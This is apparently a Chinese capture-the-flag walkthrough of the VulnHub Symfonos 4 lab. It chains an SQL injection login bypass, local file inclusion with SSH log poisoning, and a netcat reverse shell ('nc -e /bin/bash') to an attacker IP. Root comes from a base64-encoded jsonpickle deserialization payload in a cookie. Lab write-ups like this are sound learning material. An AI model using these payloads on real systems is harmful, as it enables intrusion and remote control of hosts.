本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现
地址:https://www.vulnhub.com/entry/symfonos-4,347/
nmap扫描结果
看到只有22和80端口开放,看看web应用,先爆破目录看看 dirb http://192.168.56.109 /usr/share/wordlists/dirb/big.txt -X .php
发现两个php文件,我们访问看看
访问了上面两个php文件,确认都会到达上面两个页面,其中sea.php文件会跳转到atlantis.php文件 ,试了试弱口无果,试了下各种形式的万能密码,居然成功了,进入了如下页面:
万能密码:'or '1'='1'#
在上面的选项框中选择其中一个选项
进入之后看了下URL猜测是有代码执行或者本地文件包含,首先尝试包含/etc/passwd发现页面空白,估计是没权限,那么尝试包含下ssh相关认证的日志看看,发现是可以查看,之后尝试ssh连接目标靶机,登录名填写一句话木马,然后生成的日志通过此包含漏洞进行利用
参考:https://www.hackingarticles.in/rce-with-lfi-and-ssh-log-poisoning/
http://192.168.56.109/sea.php?file=../../../../../../var/log/auth&bmfx=nc -e /bin/bash 192.168.56.101 8833 这里执行只有像我下面一样使用hackbar可以这么写,否则是需要把空格加上url编码执行
成功反弹shell,并处理成了可交互式友好的shell ,读了一下atlantis.php文件, 发现存储了数据库的账号和密码,登录数据库查到admin账户的密码,尝试破解无果
上面操作无果,那就再看看本地的进程和开放的端口,发现没有namp命令,也不想上传枚举提权脚本,也没有netstat命令,那么直接试试ps -ef 或者ps aux 然后使用grep过滤使用root权限执行的进程
发现本地以root启动的进程是本地监听8080端口,使用Python启动,应用名称含有关键字app,尝试本地搜索此关键字
得知上面代码,然后应用本地启动了8080端口,只能靶机本地能访问,尝试进行端口转发
socat TCP-LISTEN:9933,fork TCP:127.0.0.1:8080
这样看,看不出来有什么可利用的,使用burpsuite抓包看看
发现cookie处的username像是base64编码过的,尝试使用burpsuite进行解码看看
看了互联网上的演示,这里可以提权,具体代码如下
{"py/object":"main.Shell","py/reduce":[{"py/type":"os.system"},{"py/tuple":["/usr/bin/nc -e /bin/bash 192.168.56.101 8866"]},null,null,null]}
将其编码为base64
eyJweS9vYmplY3QiOiJtYWluLlNoZWxsIiwicHkvcmVkdWNlIjpbeyJweS90eXBlIjoib3Muc3lzdGVtIn0seyJweS90dXBsZSI6WyIvdXNyL2Jpbi9uYyAtZSAvYmluL2Jhc2ggMTkyLjE2OC41Ni4xMDEgODg2NiJdfSxudWxsLG51bGwsbnVsbF19
在burpsuite上进行重放
kali本地监听的8866端口成功反弹shell
